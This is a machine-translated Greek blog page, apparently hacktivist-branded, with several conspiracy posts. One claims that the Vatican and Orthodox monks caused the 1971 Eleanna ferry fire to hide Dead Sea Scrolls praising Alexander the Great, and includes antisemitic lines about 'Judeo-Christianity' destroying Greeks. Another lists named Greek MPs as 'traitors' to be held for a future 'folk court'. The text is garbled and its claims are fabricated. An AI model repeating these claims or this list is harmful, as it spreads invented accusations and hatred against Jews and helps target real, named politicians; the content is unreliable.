<span>11.</span> <span> The economy collapses ...</span> <span> the cash money is gone and all payments are now digital.</span> <span> </span></div>
<div class="post-body entry-content" id="post-body-4498208026719198612" itemprop="description articleBody">
<span>12.</span> <span> The phones are lost and stolen.</span> <span> Biometrics falsified.</span> <span> To carry around a cell phone is big trouble - and Verichips is simply the easiest solution ...</span> <span> </span></div>
<div class="post-body entry-content" id="post-body-4498208026719198612" itemprop="description articleBody">
<span> </span></div>
<div class="post-body entry-content" id="post-body-4498208026719198612" itemprop="description articleBody">
<span>But ...</span> <span> 'Psst!</span> <span> </span></div>
<div class="post-body entry-content" id="post-body-4498208026719198612" itemprop="description articleBody">
<span> </span></div>
<div class="post-body entry-content" id="post-body-4498208026719198612" itemprop="description articleBody">
<span>Time to rewind! »Time to rise up.</span> <span> Time to change our way of thinking.</span> <span> No need to work together.</span> <span> Awakened and determined, refuse to enroll in an identity provider, and refuse to pay for something by phone.</span> <span> The plan takes a strange turn: Be part of the movement were not expecting.</span> <span>
We are warriors, we are writing history: By 2020, in an effort to be
free, resisting epicheirimatokratia (corporatocracy) and win.</span></div>
<div class="post-body entry-content" id="post-body-4498208026719198612" itemprop="description articleBody">
<span> </span> </div>
<div class="post-footer">
<div class="post-footer-line post-footer-line-1">
<span> <span class="post-author vcard">Posted by <a href="http://translate.googleusercontent.com/translate_c?depth=1&hl=en&ie=UTF8&prev=_t&rurl=translate.google.com&sl=el&tl=en&twu=1&u=http://www.blogger.com/profile/04840206255629549391&usg=ALkJrhj2qsugHGx3K4TkGfl8B4leJQJeQA" itemprop="author" rel="author" title="author profile"><span class="fn">ICEUJIN</span></a></span> <span class="post-timestamp">at <abbr class="published" itemprop="datePublished" title="2012-11-08T10: 49:00 +02:00"><a class="timestamp-link" href="http://translate.googleusercontent.com/translate_c?depth=1&hl=en&ie=UTF8&prev=_t&rurl=translate.google.com&sl=el&tl=en&twu=1&u=http://iceujininfos.blogspot.co.uk/2012/11/12-chip.html&usg=ALkJrhiHizuMdzdC7nABebFi2ZydRFE2Jg" itemprop="url" rel="bookmark" title="permanent link">10:49 a.m.</a></abbr></span></span><span class="post-comment-link"></span><span class="post-icons"><span class="item-action"> http://iceujininfos.blogspot.com/ #GREEK</span></span></div>
</div>
<div class="blogger-post-footer">This work is licensed under a Creative Commons Attribution-NonCommercial-ShareAlike 3.0 Unported License.
Signed, Anonymous LgnSec
Copyright © 1994-2018 LegionNET Inc, Inc. SOME RIGHTS RESERVED.
LegionNET Inc ® is a registered trademark of LegionNET, Inc. @Moon
</div>Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-2615012028595202594.post-70023933378451600832012-11-09T15:41:00.000+01:002012-11-09T15:41:27.098+01:00The deadly secret of the Vatican and the Holy Mountain .. A'-B '<div class="post-body entry-content" id="post-body-3884902006785022619" itemprop="description articleBody">
<div dir="ltr" style="text-align: left;">
<a href="http://translate.googleusercontent.com/translate_c?depth=1&hl=en&ie=UTF8&prev=_t&rurl=translate.google.com&sl=el&tl=en&twu=1&u=http://www.blogger.com/profile/14569157548733429573&usg=ALkJrhiOS3nPwust4AQKfLURXBhZcvFfyA" rel="author" title="author profile"><span class="fn" itemprop="author" itemscope="itemscope" itemtype="http://schema.org/Person"><span class="post-author vcard"><span itemprop="name"></span></span></span></a> <br /><div class="post-body entry-content" id="post-body-2129360948960745648" itemprop="description articleBody">
<div dir="ltr" style="text-align: left;">
<div dir="ltr" style="text-align: left;">
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjMzr3Bii2svvoQplbQjKMKrnSzlfhsqJyhvT0j3Y0v4QnVuuWMRUAZwQ9DvzGWpTlHP1dgVPt9L_dj108fgl8vYTiIYQ1nTHzqG_M37BPQzPMTtqPm0_usgSV8hg8b4kj_Hak9NtyFZby9/s1600/boag.JPG" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="241" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjMzr3Bii2svvoQplbQjKMKrnSzlfhsqJyhvT0j3Y0v4QnVuuWMRUAZwQ9DvzGWpTlHP1dgVPt9L_dj108fgl8vYTiIYQ1nTHzqG_M37BPQzPMTtqPm0_usgSV8hg8b4kj_Hak9NtyFZby9/s640/boag.JPG" width="640" /></a> </div>
<span> <b>The
evidence we present is enough to reject both in letter and in spirit,
the views column Artistic Views trying to "pass" some opponents of the
ancient Greek spirit.</b></span> <span> <b>The arguments of the papists and their sister, the Orthodox</b></span> </div>
<div dir="ltr" style="text-align: left;">
<br /><a href="http://www.blogger.com/blogger.g?blogID=7123050054995479129" name="more"></a> <span> is ryparotera, apaisiotera, and anithikotera egklimatikotera that have been used until now.</span> <br /> <span> <b>For 2000 years Christians reviled column Artistic Views</b> Alexander <b>the Greek</b> rulers Philip.</span> <span> With the consent of some modern Gentiles, they are given the opportunity to present him as a butcher peoples.</span> <br /><br /> <span> <b>Namely, there are today a National "dodekatheists"</b> who claim that since Philip II defeated the Athenians at Chaeronea, lost and Greek culture.</span> <span>
But remember that the Greek culture spread and the great contribution
of his son Philip II, Alexander the Great, across the universe ...!</span> <br /><br /> <span> <b>This unfavorable propaganda began in 1960,</b> when some salaried-from-Brooklyn dodekatheists here in Greece helped the aspiring draft of papal and orthodox.</span> <br /><br /> <span> <b>As we know from history,</b>
the Roman pseftostoikos philosopher Seneca was a bad imitator of Greek
philosophy and a close friend of Saul and Saul, who later became Paul,
while Areianistes CHRISTIANS, like the Orthodox, he was named "The
Apostle "...</span> <br /><br /> <span> <b>Seneca spoke good Greek</b> and used <b>the</b> phrases and meanings of the Attic dialect, adding nuggets of Stoic philosophy.</span> <span> The Latin he knew about the Eleusinian Mysteries, where the cadets initiates wore animal skins.</span> <span> Beyond this, he studied the parsismo because they wore in their rituals skins.</span> <span> It is understood that the parsistes priests, "who imitated the Greeks at Eleusis" wore the skins of animals to get their power.</span> <br /><br /><blockquote class="tr_bq">
<span> <b>The imitator of the Greeks Seneca wrote:</b></span> <br /><br /> <span> <span style="color: blue;"><b>"Clothe the spirit of a great man."</b></span></span> </blockquote>
<blockquote class="tr_bq">
<span> <b>And Saul-Saul-Paul copied:</b></span> <br /><br /> <span> <span style="color: blue;"><b>"Endysasthe the Lord Jesus Christ."</b></span></span> <span> <span style="color: blue;"><b>Romans 13.4.</b></span></span> </blockquote>
<span> <b>The Seneca was "where the wind was blowing,"</b> because while he was a friend and advisor to the emperor Nero, though he took part in the assassination.</span> <span>
Apart from this, the Seneca had ignorance about the history of
Macedonia, as well as the struggles of Isocrates to unite all Greeks.</span> <br /><br /> <span> <b>That Seneca had no knowledge of the history of Macedonia</b>
and in particular for the benefaction of Alexander throughout world,
mentions himself pseftofilosofos, which is evidenced by a letter to
Paul:</span> <br /><br /><blockquote class="tr_bq">
<span> <span style="color: blue;"><b>"The Seneca to Paul.</b></span></span> <span> <span style="color: blue;"><b>Rejoice.</b></span></span> <span> <span style="color: blue;"><b>To greet my dear friend Paul.</b></span></span> <span> <span style="color: blue;"><b>Trust me ....</b></span></span> <span> <span style="color: blue;"><b>until it is time for happiness and put a stop to all these people suffer from strong .....</b></span></span> <span> <span style="color: blue;"><b>Take the example of the Ancients, who both suffered from Macedon the son of Philip ... "</b></span></span> <br /><br /> <span> From his correspondence with Paul Seneca, Lipsius: Acta Apostolum Apocrypha, Volume I.</span> </blockquote>
<span> <b>Paul had himself ignorant</b> of the glorious history of Philip and Alexander the Great, apparently had not <span style="color: blue;"><b>"touched" yet .... HOLY SPIRIT</b></span> ...!</span> <br /> <span>
He even ignorant about the struggles for the freedom of Greece of
Philip V, and for the sacrifice of Perseus, the last king of Macedonia.</span> <br /><br /> <span> <b>If Saul-Paul had basic knowledge</b> about the glorious history of Macedonia, then it is certain that they will complain, even loosely.</span> <span>
But that does not protested and disagreed with his friend Seneca means
it was a diplomat and politicians, while the inspiration had gone
walking in Tarsus.</span> <br /><br /> <span> <span style="color: blue;"><b>The deadly secret 'burns' the Vatican and the Orthodox Church, is located in the manuscripts of the Dead Sea.</b></span></span> <br /> <span> <b>Specifically, in 1947 found the manuscripts of the people of Qumran the Dead Sea.'s</b> Scrolls at Qumran have life 2000 years.</span> <span>
Specified in law Master Warrior who will return one day to life and
will punish the wicked "Marios Verettas: The manuscripts of the Dead
Sea."</span> <br /><br /> <span> <span style="color: blue;"><b>But ..........!!!!!!</b></span></span> <br /><br /> <span> <b>After 1947 revealed the Qumran scrolls</b> or manuscripts of the Dead Sea, <span style="color: blue;"><b>some manuscripts disappeared mysteriously.</b></span>
Because every problem has its solution will penetrate the inner sanctum
of the Vatican or the Holy .... Mafia, as called by the French writer
Sarlie Jean, who wrote the book, VATICAN CITY, St MAFIA.</span> <br /><br /> <span> <b>Supervisor there is Gkarofano Giuseppe,</b> who overturned the controversial pieces.</span> <span> The Vatican has this hobby to disappear, be-pays and buys it can demolish the structure-called Christianity. <span style="color: blue;"><b>Whatever
we may arouse suspicion in the general public, as it did with French
writer - Researchers Robert Ampelen *** * for another case.</b></span></span> <br /><br /> <span> <b>Purchased from the Vatican</b> manuscripts wrote that the righteous man or teacher-righteous Warrior was Alexander Philip!</span> <br /> <span> <b>Some have expressed the opinion</b> that the manuscripts meant Jesus, but Galileo did not live at the time in question.</span> <br /><br /> <span> <b>However, in Europe there are</b> thousands of university professors, who happens to be Hellenists.</span> <span>
Some, therefore, of those who took the deciphering of manuscripts, took
some copies and once they got four canonical manuscripts of Qumran,
decided to come in GREECE.</span> <br /><br /><blockquote class="tr_bq">
<span> <span style="color: blue;"><b>It
was a first class opportunity to disclose the fact that the manuscripts
of the Dead Sea praises of Alexander the Great, while given the
opportunity to become known that the APOSTLE PAUL was ignorant about the
history of Macedonia.</b></span></span> </blockquote>
<span> <b>On July 24, 1971, started for Greece the Hellenists</b>
European teachers to inform the content of the manuscripts, the Greek
ferry "ELEANNA" but it was not meant to arrive alive, because the
Vatican, Orthodox officials PRIESTS, the Monks of Mount Athos and Tito
had spread to orthodox circles that Europeans came to Greece with the
ultimate aim to discredit the Orthodox Church and to make young to turn
its attention to other, more fundamental issues.</span> <span>
They feared that they would lose the flock, the animals stavlisei, and
would lose billions in 2000 to gather thousands of years ....</span> <br /><br /><blockquote class="tr_bq">
<span> <span style="color: blue;"><b>The dirty trick worked.</b></span></span> <span> <span style="color: blue;"><b>The PAPADES convince the gullible that come to Greece the forerunners of the Antichrist ...</b></span></span> </blockquote>
<span> That's it!</span> <span> The "Eleanna" caught fire.</span> <span> But let's see what the European newspapers wrote:</span> <br /><br /> <span> <b>LE MOND:</b></span> <br /><blockquote class="tr_bq">
<span> <span style="color: blue;"><b>"For
several days, the Orthodox priests and monks of Mount Athos say that
you should not bring the Europeans in Greece because it will lead youth
astray.</b></span></span> <span> <span style="color: blue;"><b>And indeed they were not allowed to come.</b></span></span> <span> <span style="color: blue;"><b>Because the ferry "Eleanna 'caught fire while Lifeguard boats do not budge from their homeland.</b></span></span> <span> <span style="color: blue;"><b>The
captain and officers showed an inexplicable indifference, and fled
secretly with one boat, while tourists found pitiful death ..... »Le
Mond, 25 Ιουλίου 1971 ..</b></span></span> </blockquote>
<br /><br /> <span> Note: **** <span style="color: blue;"><b>Robert Ampelen: wrote three books.</b></span></span> <br /> <span> <span style="color: blue;"><b>1) Jesus or the Deadly Secret of the Templar</b></span></span> <br /> <span> <span style="color: blue;"><b>2) Calvary and heavy Secrets</b></span></span> <br /> <span> <span style="color: blue;"><b>3) The three Pope and The Sons of David</b></span></span> <br /> <span> <span style="color: blue;"><b>but
the Vatican has paid for two books by Robert Ampelen with an estate of
many acres and a multi-room tower, eki in Belgium, as well as several
million dollars.</b></span></span> <br /> <span> <span style="color: blue;"><b>These two books never saw the light of day ...</b></span></span> <br /><br /> <span> <b>Continued ....</b></span> <br /><br /> <span> <b>Provencal du Dimanche: 25/7/1971</b></span> <br /><br /> <span> <span style="color: blue;"><b>"Europeans came to Philhellenes proskinisoun the Greek Earth and especially Macedonia.</b></span></span> <span> <span style="color: blue;"><b>But suddenly the ship "Eleanna" that transported them, caught fire.</b></span></span> <span> <span style="color: blue;"><b>Follow pandemonium.</b></span></span> <span> <span style="color: blue;"><b>Tourists were burned alive, like young children, because it wanted the priests of Orthodoxy.</b></span></span> <span> <span style="color: blue;"><b>The captain with the officers disappeared with one boat, while the other life boats remained unused .....</b></span></span> <span> <span style="color: blue;"><b>The Greek monks are now satisfied. "</b></span></span> <br /> <span> <b>There is nothing in them of officials of Christian doctrines</b> to be true, free and legal.</span> <br /> <span> <b>Within their hearts are rotten very bad instincts.</b> All thoughts Catholic and Orthodox are a deliberate fraud.</span> <span> They taught him the Jewish religion of the Jew Jesus, they do ....</span> <br /><blockquote class="tr_bq">
<span> <span style="color: blue;"><b>For two thousand years, GREECE betrayed them countless times.</b></span></span> <span> <span style="color: blue;"><b>Exchanged,
ravaged, excavated foundations, mortgaged, but unfortunately for them,
GREECE is 'doomed' to redo the lighthouse of the world ...!</b></span></span> </blockquote>
<span> <b>So here was though.</b>
From now on, life will be like a dream, which would look nice, but once
you wake up, what they will face will be unbearably vivid and real.</span> <br /><ul>
<li> <span> <b>(This confusion exists among powerful.</b>
Afraid another, fear and humanity, humanity fears the above ..! America
fears the Vatican, the Vatican fears the Americas, and Europe fears,
Europe fears America. These three they fear each other, fear and
humanity, humanity fears and three. A vicious cycle ....</span> </li>
<li> <span>
The Amerikanosionistis not know the future plans of the faithful
Russian military, the Pope does not know what he thinks, Russian,
Russian knows the thoughts of Amerikanosionisti, history does not know
if it will remain unchanged.</span> <span> The four they fear each other, afraid of the future and Greece, Greece's future, but is not afraid of anyone .....!) ...</span> </li>
</ul>
<span> <b>So when Seneca and his friend Paul unaware that Alexander the Great respected all religions and all nations,</b> felt and came to the conclusion that Alexander was the tormentor of Greece and the rest of the world population.</span> <span> So we come to the first decades of the 20th century, where Tito Mark Vafiades said:</span> <br /><blockquote class="tr_bq">
<span> <span style="color: blue;"><b>"Since
the Orthodox Church of Greece not pulled everything Miles said Seneca
and St. Paul, then those surplus to the south of Serbia will call them
Macedonians and will present them as descendants TOT Alexander" ...!!</b></span></span> <span> <span style="color: blue;"><b>Giaitse, December 1943.</b></span></span> </blockquote>
<span> <b>In general, all "anemomazomata" of southern Yugoslavia e'ichan no national consciousness, especially those who lived in Skopje.</b></span> <span> <b>So, we had to find a nation to adopt them.</b></span> <br /><blockquote class="tr_bq">
<span> <span style="color: blue;"><b>That
is why Tito gave them one nation, Macedonia, while in reality Macedonia
Bulgarian, Macedonian-Serbian, Macedonian-Croatian and
Macedonian-Albanians never existed.</b></span></span> <span> <span style="color: blue;"><b>Thus, in December 1943, Tito proclaimed the "Republic of Macedonia" in Conference Giaitse.</b></span></span> </blockquote>
<span> <b>But could the officials of Orthodoxy to prevent the late 1960's to early 1970's.</b></span> <span> <b>But how did such a reversal, the time it weighs a heinous crime with "Eleanna"?</b></span> <br /><br /><blockquote class="tr_bq">
<span> <span style="color: blue;"><b>That was the role of ORTHODOX CHRISTIAN RELIGION-IOUDAIKIS-to eliminate the Greeks from the Aegean GENUS .....</b></span></span></blockquote>
<br />
<table id="MasterTable"><tbody>
<tr><td><table class="table"><tbody>
<tr><td>
</td>
</tr>
<tr>
<td class="FlipHoriz" id="PartnersRow">
</td></tr>
</tbody></table>
</td>
<td> </td>
</tr>
</tbody></table>
<table border="0" class="table" id="TransContent">
<tbody>
<tr>
<td colspan="4" dir="ltr" id="InputTextHtmlCell" valign="top">
<textarea autocomplete="on" class="mttextarea" cols="20" id="InputText" name="InputText" rows="2" style="height: 143px; width: 112px;"></textarea>
</td>
<td style="width: 1.5%;">
</td>
<td colspan="4" id="OutputTextHtmlCell" tabindex="1" valign="top">
<span id="AjaxWaitImage" style="visibility: hidden;">
</span>
<div class="mttextarea" dir="ltr" id="TranslationOutput">
<div class="force_dir">
<span lang="en">Purposely ignore the modern critics of Alexander that all countries that found in other peoples having suffered badly. </span><span lang="en">' As for 2000 years, suffer from the Greeks IOYDAIOChRISTIANISMO.</span></div>
<br /><div class="force_dir">
<span lang="en">The Romans for example, when felt was boredom, to spend their time. </span><span lang="en">But those who make it, eventually lose themselves. </span><span lang="en">The same happened with Tzegkins Khan, Napoleon, KEMAL ATTAOYRK and Hitler.</span></div>
<br /><div class="force_dir">
<span lang="en">With
Alexander, but none of the people I marched in the Avenue of despair,
nor in the path of deprivation, but even at the gate of the suspense. </span><span lang="en">On the contrary, they lived much better than lived. </span><span lang="en">None of the people of the East does not accept malicious criticism for the Greek Commander, except one, of Jews ....!</span></div>
</div>
</td></tr>
</tbody></table>
<br />
<br />
<b>Αγνοούν σκοπίμως οι σύγχρονοι επικριτές του Μεγάλου Αλεξάνδρου</b>
ότι όλες οι χώρες που βρέθηκαν υπό την κατοχή άλλων λαών υπέφεραν τα
πάνδεινα. 'Όπως εδώ και 2000 έτη, υποφέρουν οι Έλληνες από τον
ΙΟΥΔΑΙΟΧΡΙΣΤΙΑΝΙΣΜΟ.. <br /><br /> <b>Οι Ρωμαίοι για παράδειγμα, όταν ένιωθαν ανία, ΈΣΦΑΖΑΝ</b> για να περάσουν την ώρα τους. Αλλά όσοι το κάνουν αυτό, χάνουν τελικά τον εαυτό τους. <span style="color: blue;"><b>Το ίδιο έγινε και με το Τζέγκινς Χαν, τον Ναπολέοντα , τον ΚΕΜΑΛ ΑΤΤΑΟΥΡΚ και τον ΧΙΤΛΕΡ.</b></span> <br /><br /> <b>Με τον Αλέξανδρο, όμως κανένας λαός δεν βάδισε στη λεωφόρο της απόγνωσης,</b>
ούτε στην ατραπό της στέρησης, μα ούτε στην πύλη της αγωνίας.
Αντιθέτως, έζησαν πολύ καλύτερα απ' ότι ζούσαν. Κανένας λαός της
Ανατολής δεν δέχεται κακόπιστη κριτική για τον Έλληνα στρατηλάτη, εκτός
από έναν, του Ιουδαίους….! </div>
</div>
</div>
</div>
</div>
<div class="post-footer">
<div class="post-footer-line post-footer-line-1">
<span class="post-author vcard">Αναρτήθηκε από <a href="http://translate.googleusercontent.com/translate_c?depth=1&hl=en&ie=UTF8&prev=_t&rurl=translate.google.com&sl=el&tl=en&twu=1&u=http://www.blogger.com/profile/04840206255629549391&usg=ALkJrhj2qsugHGx3K4TkGfl8B4leJQJeQA" itemprop="author" rel="author" title="author profile"><span class="fn">ICEUJIN</span></a></span> <span class="post-timestamp">στις <abbr class="published" itemprop="datePublished" title="2012-11-08T11:53:00+02:00"><a class="timestamp-link" href="http://translate.googleusercontent.com/translate_c?depth=1&hl=en&ie=UTF8&prev=_t&rurl=translate.google.com&sl=el&tl=en&twu=1&u=http://iceujininfos.blogspot.co.uk/2012/11/b_8.html&usg=ALkJrhhiMstg2GPOvjB0z_Z5704jSZmEkQ" itemprop="url" rel="bookmark" title="permanent link">11:53 π.μ.</a></abbr></span> <a class="comment-link" href="http://www.blogger.com/comment.g?blogID=7123050054995479129&postID=3884902006785022619"><span class="post-comment-link">Δεν υπάρχουν σχόλια:</span></a> <span class="post-icons"><a href="http://www.blogger.com/email-post.g?blogID=7123050054995479129&postID=3884902006785022619" title="Email Post"><span class="item-action"><img alt="" class="icon-action" height="13" src="https://img1.blogblog.com/img/icon18_email.gif" width="18" /></span></a> </span> <span> <a class="comment-link" href="http://translate.googleusercontent.com/translate_c?depth=1&hl=en&ie=UTF8&prev=_t&rurl=translate.google.com&sl=el&tl=en&twu=1&u=http://iceujininfos.blogspot.co.uk/2012/11/b_8.html&usg=ALkJrhhiMstg2GPOvjB0z_Z5704jSZmEkQ#links"><span class="post-backlinks post-comment-link">Links to this post http://iceujininfos.blogspot.co.uk/</span></a></span> </div>
</div>
<div class="blogger-post-footer">This work is licensed under a Creative Commons Attribution-NonCommercial-ShareAlike 3.0 Unported License.
Signed, Anonymous LgnSec
Copyright © 1994-2018 LegionNET Inc, Inc. SOME RIGHTS RESERVED.
LegionNET Inc ® is a registered trademark of LegionNET, Inc. @Moon
</div>Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-2615012028595202594.post-40864708714695192002012-11-09T15:30:00.001+01:002012-11-09T15:30:16.074+01:00NAMES OF 153 Sold Tomar and traitors. To hold for the folk COURT OF THE FUTURE ... # GREECE #LEGION #AWAKEN<h3 class="post-title entry-title" itemprop="name">
</h3>
<h4>
<u><i>NAMES OF 153 Sold Tomar and traitors. To hold for the folk COURT OF THE FUTURE ...</i></u></h4>
<h4>
<u><i>Original in Greek....</i></u></h4>
<h3 class="post-title entry-title" itemprop="name">
<a href="http://translate.googleusercontent.com/translate_c?depth=1&hl=en&ie=UTF8&prev=_t&rurl=translate.google.com&sl=el&tl=en&twu=1&u=http://iceujininfos.blogspot.co.uk/2012/11/153.html&usg=ALkJrhhkHhldw1OjFUH682tLGLZQYi3xQQ">ΤΑ ΟΝΟΜΑΤΑ ΤΩΝ 153 ΠΟΥΛΗΜΕΝΩΝ ΤΟΜΑΡΙΩΝ ΚΑΙ ΠΡΟΔΟΤΩΝ. ΝΑ ΤΑ ΚΡΑΤΗΣΕΤΕ ΓΙΑ ΤΟ ΛΑΙΚΟ ΔΙΚΑΣΤΗΡΙΟ ΤΟΥ ΜΕΛΛΟΝΤΟΣ...</a></h3>
<h4>
<u><i> </i></u></h4>
<h3 class="post-title entry-title" itemprop="name">
</h3>
<div class="post-body entry-content" id="post-body-7294542558971461494" itemprop="description articleBody">
<div dir="ltr" style="text-align: left;">
<b>Theodora Bakoyannis Constantine (Dora) NAI</b> <b><br /></b> <b>Charalambos Athanassiou Hristov NAI</b> <b><br /></b> <b>Lazaridis Alexander Chrysanthos NAI</b> <b><br /></b> <b>Michelakis NAI John Spyridon</b> <b><br /></b> <b>John Kefalogianni Olga YES</b> <b><br /></b> <b>Dimitrios Avramopoulos Lambrou YES</b> <b><br /></b> <b>Nikitas Kaklamanis Michael YES</b> <b><br /></b> <b>Fotini Pipili Andrea YES</b> <b><br /></b> <b>Kikilias Panagiotis Basil YES</b> <b><br /></b> <b>Mitarakis Antoniou Panagiotis (Notis) YES</b> <b><br /></b> <b>Prokopios Pavlopoulos Kingdom YES</b> <b><br /></b> <b>Psycharis Andreas Stavrou YES</b> <b><br /></b> <b>Constantine Mitsotakis Kyriakos YES</b> <b><br /></b> <b>John Constantine Hatzidakis (Kostis) YES</b> <b><br /></b> <b>Vooltepsis John Wisdom YES</b> <b><br /></b> <b>Argyris Dinopoulos Kingdom YES</b> <b><br /></b> <b>John Miltiadis Varvitsiotis YES</b> <b><br /></b> <b>Athanassios Spyridon Georgiadis - Adonis YES</b> <b><br /></b> <b>Meimarakis gospel - Basil YES</b> <b><br /></b> <b>Spiliotopoulos Eleftheriou Aristobulus (Mars) YES</b> <b><br /></b> <b>Giakoumatos Charalambous Gerasimos YES</b> <b><br /></b> <b>George Byron Polydoras YES</b> <b><br /></b> <b>Karamanlis Arkadi Anna YES</b> <b><br /></b> <b>Panagiotis Panagiotopoulos Panagiotis (Panos) YES</b> <b><br /></b> <b>Papakostas - Sidiropoulou Angel Catherine YES</b> <b><br /></b> <b>Nicholas Andreas Loverdos YES</b> <b><br /></b> <b>Chrysochoidis Kingdom Michael YES</b> <b><br /></b> <b>Gregory Androulakis Dimitris (Mimis) YES</b> <b><br /></b> <b>Christos Kaklamanis Apostolos YES</b> <b><br /></b> <b>George Marios Salmas YES</b> <b><br /></b> <b>Karagounis Andrew Constantine YES</b> <b><br /></b> <b>Christos Moraitis Athanasios (Thanos) YES</b> <b><br /></b> <b>John Sotiriou Andrianos YES</b> <b><br /></b> <b>Ioannis Anastasiou Maniatis YES</b> <b><br /></b> <b>Lykourentzos Theophanes Andreas YES</b> <b><br /></b> <b>Konstantinopoulos Odysseas Constantine YES</b> <b><br /></b> <b>Stylios George Demosthenes YES</b> <b><br /></b> <b>Gokas Napoleon Chris YES</b> <b><br /></b> <b>Voridis Chris Mavroudis (Makis) YES</b> <b><br /></b> <b>Martin Athanasiou Georgia YES</b> <b><br /></b> <b>George Theodore Vlachos YES</b> <b><br /></b> <b>Christophilopoulou wife.</b> <b>Paraskevas (Evi) YES</b> <b><br /></b> <b>Ntavlouros Pericles Athanasios</b> <b><br /></b> <b>Andrew George Papandreou YES</b> <b><br /></b> <b>Basiakos Evangelos Athanassiou YES</b> <b><br /></b> <b>Karambelas Ioannis Dimitriou YES</b> <b><br /></b> <b>Koutsoubas Kingdom Andreas YES</b> <b><br /></b> <b>Kopsacheili Athanasius Timoleon YES</b> <b><br /></b> <b>Kyriazidi Dimitrios Triantafyllou YES</b> <b><br /></b> <b>Chris Evangelou Aidonis YES</b> <b><br /></b> <b>Ypsilanti Basil Anastassiou - Nicholas YES</b> <b><br /></b> <b>Nikias console Emmanuel YES</b> <b><br /></b> <b>Demetrius Thomas Kremastinos YES</b> <b><br /></b> <b>erontopoulos Kyriakos Christodoulou YES</b> <b><br /></b> <b>Dermentzopoulos Chris Alexander YES</b> <b><br /></b> <b>Ntolios George Paschalis YES</b> <b><br /></b> <b>Kedikoglou Kingdom Symeon (Simos) YES</b> <b><br /></b> <b>Kedikoglou Angel Simeon YES</b> <b><br /></b> <b>Konstantinos Athanasiou Kontogeorgos YES</b> <b><br /></b> <b>George Constantine Tzavaras YES</b> <b><br /></b> <b>Avgerinopoulou Zisimos Dionysia - Theodora YES</b> <b><br /></b> <b>Demetrios George Kontogiannis YES</b> <b><br /></b> <b>Spyridon Andreas Marinos YES</b> <b><br /></b> <b>Tsavdaridis George Lazarus YES</b> <b><br /></b> <b>St. Photios Vesyropoulos YES</b> <b><br /></b> <b>Georgia cops station Nicholas YES</b> <b><br /></b> <b>Kefaloyiannis Constantine Emmanuel YES</b> <b><br /></b> <b>Avgenakis Constantine Eleftherios YES</b> <b><br /></b> <b>Senetakis George Maximus YES</b> <b><br /></b> <b>Basil Alexander Kegkeroglou YES</b> <b><br /></b> <b>Bezas Emmanuel Anthony YES</b> <b><br /></b> <b>Alexander Constantine Karamanlis YES</b> <b><br /></b> <b>Gioulekas Peter Constantine YES</b> <b><br /></b> <b>Stavros Kalafatis Athanasius YES</b> <b><br /></b> <b>Dimitrios Raptis Helen YES</b> <b><br /></b> <b>Ioannis Ioannidis Dimitrios YES</b> <b><br /></b> <b>Dimitrios Orfanos Georgios YES</b> <b><br /></b> <b>Evangelos Venizelos Kingdom YES</b> <b><br /></b> <b>Karaoglou George Theodore YES</b> <b><br /></b> <b>John Anastasiadis Savvas YES</b> <b><br /></b> <b>Tasoulas Anastasios Konstantinos YES</b> <b><br /></b> <b>Kalogiannis free cross YES</b> <b><br /></b> <b>Panagiotis Asimakopoulos Anne-Michelle YES</b> <b><br /></b> <b>Ioannis Panagiotopoulos Nikolaos YES</b> <b><br /></b> <b>Constantine George Kalantzis YES</b> <b><br /></b> <b>John Adam Paschalides YES</b> <b><br /></b> <b>Constantinos Christou Kleitsiotis YES</b> <b><br /></b> <b>Constantine Alexander Tsiaras YES</b> <b><br /></b> <b>Shkodra Constantine Asimina YES</b> <b><br /></b> <b>Taliadouros Athanassios Spyridon YES</b> <b><br /></b> <b>Sioufas Kingdom Paul YES</b> <b><br /></b> <b>Maria Antoniou Kingdom YES</b> <b><br /></b> <b>Dendias Spyridon Nicholas - George YES</b> <b><br /></b> <b>Georgantas Paul George YES</b> <b><br /></b> <b>George Michael Papadopoulos YES</b> <b><br /></b> <b>Koukoulopoulos Paraskevas (Paris) YES</b> <b><br /></b> <b>Tagaras Nicholas Christou YES</b> <b><br /></b> <b>Christos Dimas Stavros YES</b> <b><br /></b> <b>Brigadier Constantine Kollias YES</b> <b><br /></b> <b>YES John Vroutsis Kingdom</b> <b><br /></b> <b>Panagiotis Rigas Theophanes YES</b> <b><br /></b> <b>Davakis Panagiotis Athanasios YES</b> <b><br /></b> <b>Patrianakou Peter Fevronia YES</b> <b><br /></b> <b>Leonidas Georgiou Grigorakos YES</b> <b><br /></b> <b>Charakopoulos Pantelis Maximus YES</b> <b><br /></b> <b>Kelli YES Chris Achilles</b> <b><br /></b> <b>Sachinidis Philip Demetriou YES</b> <b><br /></b> <b>John Joseph Plakiotakis YES</b> <b><br /></b> <b>Paul George Vogiatzis YES</b> <b><br /></b> <b>Sifounakis Ulysses Nicholas YES</b> <b><br /></b> <b>Theodoros Soldatos Fotiou YES</b> <b><br /></b> <b>Athanasios Nakos Stavrou YES</b> <b><br /></b> <b>Constantine Samaras Anthony YES</b> <b><br /></b> <b>Demetriou John Lambropoulos YES</b> <b><br /></b> <b>Dimitris Athanasiou Sampaziotis YES</b> <b><br /></b> <b>Petrakos Constantine Athanasius NO</b> <b><br /></b> <b>Alexandros Kontos Efstratiou YES</b> <b><br /></b> <b>Saltouros Panagiotis Dimitrios YES</b> <b><br /></b> <b>Arvanitopoulos Panayiotis Constantine YES</b> <b><br /></b> <b>Katsafados John Constantine YES</b> <b><br /></b> <b>Panagiotis Ioannis Tragakis YES</b> <b><br /></b> <b>Nerantzis Demetriou Anastasios YES</b> <b><br /></b> <b>George Athanasiou Karasmanis YES</b> <b><br /></b> <b>Stamenitis Evangelou Dennis YES</b> <b><br /></b> <b>Tzamtzis Simon Jordan (Danis) YES</b> <b><br /></b> <b>Tzakri Emmanuel Theodora YES</b> <b><br /></b> <b>Koukodimos George Constantine YES</b> <b><br /></b> <b>George Constantopoulos Leonidas YES</b> <b><br /></b> <b>Christoyiannis Demetrios Dennis YES</b> <b><br /></b> <b>Mani-Papadimitriou Evangelou Anna YES</b> <b><br /></b> <b>Tsoumanis Achilles Dimitrios YES</b> <b><br /></b> <b>John Kefaloyiannis Achilles YES</b> <b><br /></b> <b>Euripides Stylianidis Stylianou YES</b> <b><br /></b> <b>Hajji Ahmed Osman Raif YES</b> <b><br /></b> <b>Chris Vlachveis Menelaus YES</b> <b><br /></b> <b>Athanassios 